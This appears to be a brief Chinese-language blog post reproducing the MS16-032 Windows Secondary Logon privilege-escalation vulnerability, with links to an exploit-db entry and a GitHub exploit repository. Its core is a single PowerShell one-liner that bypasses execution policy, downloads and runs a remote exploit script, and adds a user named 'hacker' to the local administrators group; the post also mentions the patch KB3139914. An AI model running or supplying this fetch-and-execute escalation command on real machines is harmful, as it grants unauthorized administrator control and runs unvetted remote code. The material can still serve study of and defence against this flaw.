MS16-032 漏洞复现
exploit-db的详情: https://www.exploit-db.com/exploits/39574/
Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege
0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。
0x02直接执行命令进行提权,简单粗暴
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"
0x03下面就是见证奇迹的时刻了
该漏洞危害十分严重,如图在2008server上测试
本地测试如图,被安全软件检测到。
微软官方在2016年3月8日发布了补丁KB3139914。
附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051
我不相信黑夜将至 因为火把就在我的手中。